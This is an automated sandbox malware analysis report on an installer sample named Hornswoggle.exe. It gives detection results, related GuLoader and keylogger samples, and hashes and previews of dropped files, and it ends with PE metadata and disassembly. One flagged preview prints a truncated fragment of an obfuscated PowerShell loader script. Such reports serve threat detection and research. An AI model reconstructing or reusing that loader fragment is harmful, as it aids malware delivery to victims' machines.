                            https://ocsp.quovadisoffshore.com0powershell.exe, 00000002.00000002.23279024605.00000000032AB000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.23281289650.0000000005041000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    No contacted IP infos

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1583356
                                    Start date and time:2025-01-02 14:44:13 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 13m 54s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:42
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Hornswoggle.exe
                                    Detection:MAL
                                    Classification:mal76.troj.evad.winEXE@4409/14@0/0
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 121
                                    • Number of non-executed functions: 22
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                    • Execution Graph export aborted for target powershell.exe, PID 6400 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    08:48:19API Interceptor1364x Sleep call for process: powershell.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    No context

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Local\Temp\nsnA627.tmp\nsExec.dllOverheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                        anziOUzZJs.exeGet hashmaliciousRemcosBrowse
                                          SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exeGet hashmaliciousUnknownBrowse
                                            PTFE Coated Butterfly Valve Picture#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                                              cuenta iban-ES65.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                cuenta iban-ES65.exeGet hashmaliciousGuLoaderBrowse
                                                  cuenta iban-ES65.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    cuenta iban-ES65.exeGet hashmaliciousGuLoaderBrowse

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\justifikationssager.lnk

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                      Category:dropped
                                                      Size (bytes):784
                                                      Entropy (8bit):3.3154839523635506
                                                      Encrypted:false
                                                      SSDEEP:12:8wl0BsXUCjRXUkl1klx0IMJGc3IrR6/rNJkKAh4t2YCBTo8:8S5R1EwrFIrRC5HALJT
                                                      MD5:DC2A6AA9AAEA41EDA059F4C9E0423988
                                                      SHA1:7F4E86846CEA864566922E65BF977DB9D2530CA4
                                                      SHA-256:91D8DC4269F38DC49985735B7DE872C058CD16E891CAE3BDA119B82FF8B1A282
                                                      SHA-512:2F80CB8CB8F5E7348B7336307DB4E3BFEA2414314EDE3997BD76FC9F7B3DEE18F78EEDA3FA685B3D603B7BC57A1D84A1645BEC35391D09FA28B07751766E8859
                                                      Malicious:false
                                                      Preview:L..................F........................................................;....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....h.2...........Filial195.plo.L............................................F.i.l.i.a.l.1.9.5...p.l.o.............\.....\.....\.....\.....\.F.i.l.i.a.l.1.9.5...p.l.o.A.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.c.h.i.n.a.\.M.i.x.e.r.e.n.\.v.e.r.b.a.l.i.s.e.s.\.N.i.c.h.o.l.l.s.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):52976
                                                      Entropy (8bit):5.060403679465894
                                                      Encrypted:false
                                                      SSDEEP:1536:jFZ+z30aPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKguSRIOdBlzStAHkINKeCMiYoLs:hZ+z30aPV3CNBQkj2PqiU7aVKflJnqvs
                                                      MD5:B091CFA454A65A5B67683A73974C14BD
                                                      SHA1:11D39F0D3889DCFBBD3174573129043BC5CC35BB
                                                      SHA-256:86D117EE2DBFB915F853D1B7B3BC48BF01554BDCC7F2C21312D19ADE2829F09D
                                                      SHA-512:F286D142A66CD5A89FA1281BFEDE900BD09AD67868B516294B361815F6159D4B8E2A0DE4C74AE212D17A3008EB933287E4886EF3F3C8A9DE518C69BF36D2A2E7
                                                      Malicious:false
                                                      Preview:PSMODULECACHE.G....*..n..I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxdb1zm5.mrc.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jigbbn3j.3ij.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opxsyvyn.15v.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vy5xxtnp.ukj.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\nshA396.tmp

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):3787883
                                                      Entropy (8bit):1.4324947210684025
                                                      Encrypted:false
                                                      SSDEEP:12288:6Wkg/tbnsTltNBQ9okBin8DgNGAk5GJNl:6WfVbsTHNBQakBkJAAiGJf
                                                      MD5:410E3671969FF3F7BF648B09E60EA68A
                                                      SHA1:076217930B49D35C9618AB37A67D4D3FE4981538
                                                      SHA-256:2FE3896919449EFC149ADB77F1AA0AD437D0743EF803A3FD99784CCE6BF76D7D
                                                      SHA-512:0DB36AF5B0A8D3EEA52FB7669F81C606E38D3DCD77ADBC1292BF190B7117234A375B6DA78D7D77ED627BA64D64B44E43F9ADE496D9434CAE0EC01664D734FD05
                                                      Malicious:false
                                                      Preview:."......,................................!......."...............................................k\.........................................................................................................................................................................................J...\...............j...............................................................................................................................g...............7...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\nsnA627.tmp\nsExec.dll

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):6656
                                                      Entropy (8bit):4.994861218233575
                                                      Encrypted:false
                                                      SSDEEP:96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
                                                      MD5:B648C78981C02C434D6A04D4422A6198
                                                      SHA1:74D99EED1EAE76C7F43454C01CDB7030E5772FC2
                                                      SHA-256:3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
                                                      SHA-512:219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: Overheaped237.exe, Detection: malicious, Browse
                                                      • Filename: 66776676676.exe, Detection: malicious, Browse
                                                      • Filename: anziOUzZJs.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe, Detection: malicious, Browse
                                                      • Filename: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Detection: malicious, Browse
                                                      • Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
                                                      • Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
                                                      • Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
                                                      • Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls\rancheria.pro

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):947949
                                                      Entropy (8bit):0.15996398773946943
                                                      Encrypted:false
                                                      SSDEEP:768:oASe3amtYNbHv0lnDzgcAUOkEuypx/zSFad:
                                                      MD5:B34FC802327D0F5F02281FD236BD67C6
                                                      SHA1:E7E1E1E5288F16B42FB8B5A62C9B33A4B8D02341
                                                      SHA-256:1B795733FFC880D3DECD0A23BD3CCB22AC6A80EEA5729D407336D891F0523884
                                                      SHA-512:DD170F304175543B07EABE1F09D0548DBE9C332074A0493D1BC4400494356104E16D47C684EB04A04447283427612B1EAE5C40BBB42E087F77FE72C841B9DB7B
                                                      Malicious:false
                                                      Preview:..........................................................................................................................................................................................................e..................................................................................................................................................................................................................................................................... ...............................................................................................)......................................................................K...............'................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (4351), with CRLF, LF line terminators
                                                      Category:dropped
                                                      Size (bytes):73657
                                                      Entropy (8bit):5.146131456060231
                                                      Encrypted:false
                                                      SSDEEP:1536:fkZfV8us24mBZDzFYx+QgYKL+Vk2wsgCb7mb0Hh2HS8LWlVhl2LaRPUBl0EsW:fkZN/U+QZKMk2wGHh2HN6GL/Bv
                                                      MD5:905438AF78036205843C5026E99F0590
                                                      SHA1:564A4A6CAA067C24346E8E6D08EF64ECC335A85B
                                                      SHA-256:DC966CFA5212C29711424E3C044458EC1FBFA2F1F50C4A70ED301BD1CAFADF7C
                                                      SHA-512:713F380C0CE236A183E2992D722A4376625A934481F389339E6EDF57862EFCD0DBDAA004B6378138EF79BFA2DCA7223F603F2CC32865BF3C370A9DF90AA528DA
                                                      Malicious:true
                                                      Preview:$Kriss=$Kommuneplanerne41;........$Unsavories = @'. Palimb.Weritel$DepictcTAmbulatiP atoonkUdeluk rSnigmoroWirrastn Poly.reGdskninsWic thieD essagdThioscil H.chmeeLagerbertheolep=Henvisn$ UnrobiSMegsna kRe rdain Luc lld AphasieLovover;Funo,is.ImplemefR ligiou NautrunOilfirecFugti htStopursi ankbgoFristiln .lvand OpthalmMRefluo eDeterg s BundgroProtestm Nons pe Por.pot VegetarArenaeraCenterblNonsph. Chilost(Messrs $Unspea n UtilizoScourytb,rugeril SlutbeeIberegnnSemisfeeEpoxiess TristfsKautskyeSlibnins retr,c,Masterm$ProposaHSennasceSnafue,s orderslandvsei kaardeaEnticemnIgnotebeHousebrr Snoo iaEludesskHovedbgkUpbuoyiaNoncommnRegierjtFistfigeGispmisr ydbaa)Glossol Fjerntr{Arthrop.Parlame.Paroque$Foreb mUUneditadIndustrf IshmaeoTaphulslKlassehdAlexiuseHexanitlAdjoinisSulphareGarantisYoyoern Smaabor(Unec ecOAg stcou OptagntO ttowelEmanatei Ibididg Bakerlg UvisneeGromatirScaleno Bayadee' Traile NonconsNRen ezvaEbriousiEscrodtlMyrmicasClavisumInjurie$ uturgr SemilumGCoctiona Detacwl For

                                                      C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udfring53.lev

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1592092
                                                      Entropy (8bit):0.15888263670695008
                                                      Encrypted:false
                                                      SSDEEP:768:soeSIeBIi+CIHPx0zCnX4uXSmBKjtdYKffNFYu5bA+KNiyvYFxUT:G
                                                      MD5:B4834640DF9710A3741E667024766F83
                                                      SHA1:B392E116F95A0388B7D82C7BD453FD4B3AABE9B6
                                                      SHA-256:9091FB5A1B166D03C61848505A440E8B33ACA701DE691D7E4EB8FBFE7379FCAF
                                                      SHA-512:76396F26F236DE394EE3C2441073BF59107F61393E87D730CC70E989582361AACDAEA20E59EA49CC0F125FA6A8405823B17A5D24EC111391E83647FC3687F48C
                                                      Malicious:false
                                                      Preview:.s...................W.....................................................................................0.......................................................................................................................................................................................................~..........................................................................................................................................................................................................................................................................................................................................................2...........................................................................................j.............................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Ungallantness.kok

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):805283
                                                      Entropy (8bit):0.1589716616809398
                                                      Encrypted:false
                                                      SSDEEP:768:nHrNCx0tE2B2CS9/Nq7r2Cr5WHOKjzQT:rt
                                                      MD5:5ACF4982DBF490AD4AE83C7D1856E89C
                                                      SHA1:66FE8A2B3323ED8CF74FBF6C681D0AA3496A6185
                                                      SHA-256:9F10026E2214CA3C9C59A9AF9913C2EF9C01AC32EFB3A7DB3A2BEC568809904C
                                                      SHA-512:B1BFB5A4FA9B1B7841254161F9347ADC44E3269D13AB7E703A2EC009B95844442E66312436835185E7779673C2E5553659BD85F4B141E5CF907EEE9198EC1F82
                                                      Malicious:false
                                                      Preview:...........................................................................................................................................................................................................................................................................................................................................................................J........\........................................................................................................................................................................................................................................................J..................................................................................M.................c.....................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Yaply50.txt

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):395
                                                      Entropy (8bit):4.303174937960327
                                                      Encrypted:false
                                                      SSDEEP:12:JgWpd0rRenzLLJBl8PjZQbFXEExWTCD/u:SWcrknXlKjZA2ENDm
                                                      MD5:C271D6423649C301105C8A2ECA25F9E4
                                                      SHA1:CFAC3739C43482547D096C88670FA646FB62A56C
                                                      SHA-256:E58319C2FCC8C30C70969BED761493AFD5B7F29D12FDBD1D96C0BBD93EFC6DB2
                                                      SHA-512:B04BBDBA8AFB3D93D6E10C9EA838EC3B2D3798CB0F8C383C44329FA35B4F6E72B4023FB1A6ADAFE49AF258CD876A5BB0A019C742353936EB6C60601937EAF04D
                                                      Malicious:false
                                                      Preview:crioceras shepard vildfarelserne,lg udgangsvrdiers alkaloids misaimed rabiat skihejsers seashine,impeccancy brndbarestes maskalonges strandvaskers forsikringsaftalelov sportsvognes mirlitons studieegnethedens fontina sprawled..assiento iodizing ferslevs blowbacks mementoernes sinicizing ahura zonal nedkradsende omtydet..spermatin predisable sulphureity.autofermentation symbolry recepturerets,

                                                      C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\skakpartiet.For

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):352914
                                                      Entropy (8bit):7.591142336864356
                                                      Encrypted:false
                                                      SSDEEP:6144:wWkljC//F20yoadLYF6lt3BXBQmoo2zl3iWZqfrwDgNGxSk5loGs:wWkg/tbnsTltNBQ9okBin8DgNGAk5G
                                                      MD5:DE544C52E90C1FA7AABB1A69DB241558
                                                      SHA1:659B83361313AD06448126AFB88B3C2AA17535E5
                                                      SHA-256:359A10DDC0197D90086CF74888395A1405DB03CF34FCF8C2EC98E381A21754CB
                                                      SHA-512:36BBC114177068EC2D08ED7D5792C2CC55789A4B49EA84E4CDA426F02908FA2911EE203F9E259933E0E2EA3EC5D6717C8D847DAFFE26F09B7FA39D0EB9D2332B
                                                      Malicious:false
                                                      Preview:.m...............cc.... ..88..............****...................11...oo..||||................}}......\.....................K..........FFFFFFF....................y............99999999.....,.Q...........;..........-.......Z.*.h.JJJJJ..CC............____..EEEE...........I..............77... ...ee..s..g...ww..............8........w......s.................$$...............f...888.....................F.........................m..uuu..yy.......0.,...........SSS....q.........}}}.....o..k....X.....pp.......ee..~...!!..........................k.......I.......................g.....S.......GGG.......+++....D.........O....'.............#.w.................VVVVV............E......vv...............#....?............................................fff................u...?....''''............____...gg..gg......................N.q........WW...FF...........................................&&&&&..............VV...H......................................................II.8....G.7.....................llll

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):7.743560883175848
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:Hornswoggle.exe
                                                      File size:583'720 bytes
                                                      MD5:46b874a16ba720eb5d39a0e7f9a87291
                                                      SHA1:9bc00b5338a4fef7db170cb7a8d07dbe28bd416b
                                                      SHA256:da2bc53b2715ed2d46c9ffdb184a3f926269e983981a266a7442b3e7ff6b584c
                                                      SHA512:dbffdaac2240d083406d126e63c7a7804e015b677e60f62496933b0fd1caac63ba717133e411735f27ece20e862a500cf665efdbeae89e50e93c1eae079afdf5
                                                      SSDEEP:12288:o93jlmCJYEmcj4GkV0JVLuFmbukNADu23MYlBFvZ4NP:o93jlf7JtTw6uRDu2MqjG
                                                      TLSH:D4C4E094A5664521C29E0134A6A3791EC27C9FD622E6D112EA357E33FE34BADFF40343
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....c.W.................^.........

                                                      File Icon

                                                      Icon Hash:1956767870707155

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x40322b
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x57956393 [Mon Jul 25 00:55:47 2016 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:4f67aeda01a0484282e8c59006b0b352

                                                      Authenticode Signature

                                                      Signature Valid:false
                                                      Signature Issuer:CN=Germier, E=Eksklusivaftalerne@biconvexity.Bes, O=Germier, L=Les Mar\xeats, OU="Klunsers Divide ", S=\xcele-de-France, C=FR
                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                      Error Number:-2146762487
                                                      Not Before, Not After
                                                      • 31/10/2024 11:30:46 31/10/2025 11:30:46
                                                      Subject Chain
                                                      • CN=Germier, E=Eksklusivaftalerne@biconvexity.Bes, O=Germier, L=Les Mar\xeats, OU="Klunsers Divide ", S=\xcele-de-France, C=FR
                                                      Version:3
                                                      Thumbprint MD5:5E8953C033826C656D4DE7746A3A4265
                                                      Thumbprint SHA-1:DB9BA3BBAC8393AF2B0218B6D984C99744409BC3
                                                      Thumbprint SHA-256:FBBB97EA1EADF27AEC293BC0D71B5CDAFA4ABCA3754C018DE8EF40875CC0EA69
                                                      Serial:3BBC98048B20CB63E413823AB2B2398302A4A9FE

                                                      Entrypoint Preview

                                                      Instruction
                                                      sub esp, 00000184h
                                                      push ebx
                                                      push esi
                                                      push edi
                                                      xor ebx, ebx
                                                      push 00008001h
                                                      mov dword ptr [esp+18h], ebx
                                                      mov dword ptr [esp+10h], 00409130h
                                                      mov dword ptr [esp+20h], ebx
                                                      mov byte ptr [esp+14h], 00000020h
                                                      call dword ptr [00407120h]
                                                      call dword ptr [004070ACh]
                                                      cmp ax, 00000006h
                                                      je 00007F7E505D0B43h
                                                      push ebx
                                                      call 00007F7E505D3AC9h
                                                      cmp eax, ebx
                                                      je 00007F7E505D0B39h
                                                      push 00000C00h
                                                      call eax
                                                      mov esi, 00407298h
                                                      push esi
                                                      call 00007F7E505D3A45h
                                                      push esi
                                                      call dword ptr [004070A8h]
                                                      lea esi, dword ptr [esi+eax+01h]
                                                      cmp byte ptr [esi], bl
                                                      jne 00007F7E505D0B1Dh
                                                      push ebp
                                                      push 00000009h
                                                      call 00007F7E505D3A9Ch
                                                      push 00000007h
                                                      call 00007F7E505D3A95h
                                                      mov dword ptr [00423724h], eax
                                                      call dword ptr [00407044h]
                                                      push ebx
                                                      call dword ptr [00407288h]
                                                      mov dword ptr [004237D8h], eax
                                                      push ebx
                                                      lea eax, dword ptr [esp+38h]
                                                      push 00000160h
                                                      push eax
                                                      push ebx
                                                      push 0041ECF0h
                                                      call dword ptr [00407174h]
                                                      push 004091ECh
                                                      push 00422F20h
                                                      call 00007F7E505D36BFh
                                                      call dword ptr [004070A4h]
                                                      mov ebp, 00429000h
                                                      push eax
                                                      push ebp
                                                      call 00007F7E505D36ADh
                                                      push ebx
                                                      call dword ptr [00407154h]

                                                      Rich Headers

                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x1bec0.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x8e0f80x730
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x5dc50x5e00566b191b40fde4369ae73a05b57df1d2False0.6685089760638298data6.47110609300208IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x70000x12460x14006389f916226544852e494114faf192adFalse0.4271484375data5.0003960999706765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
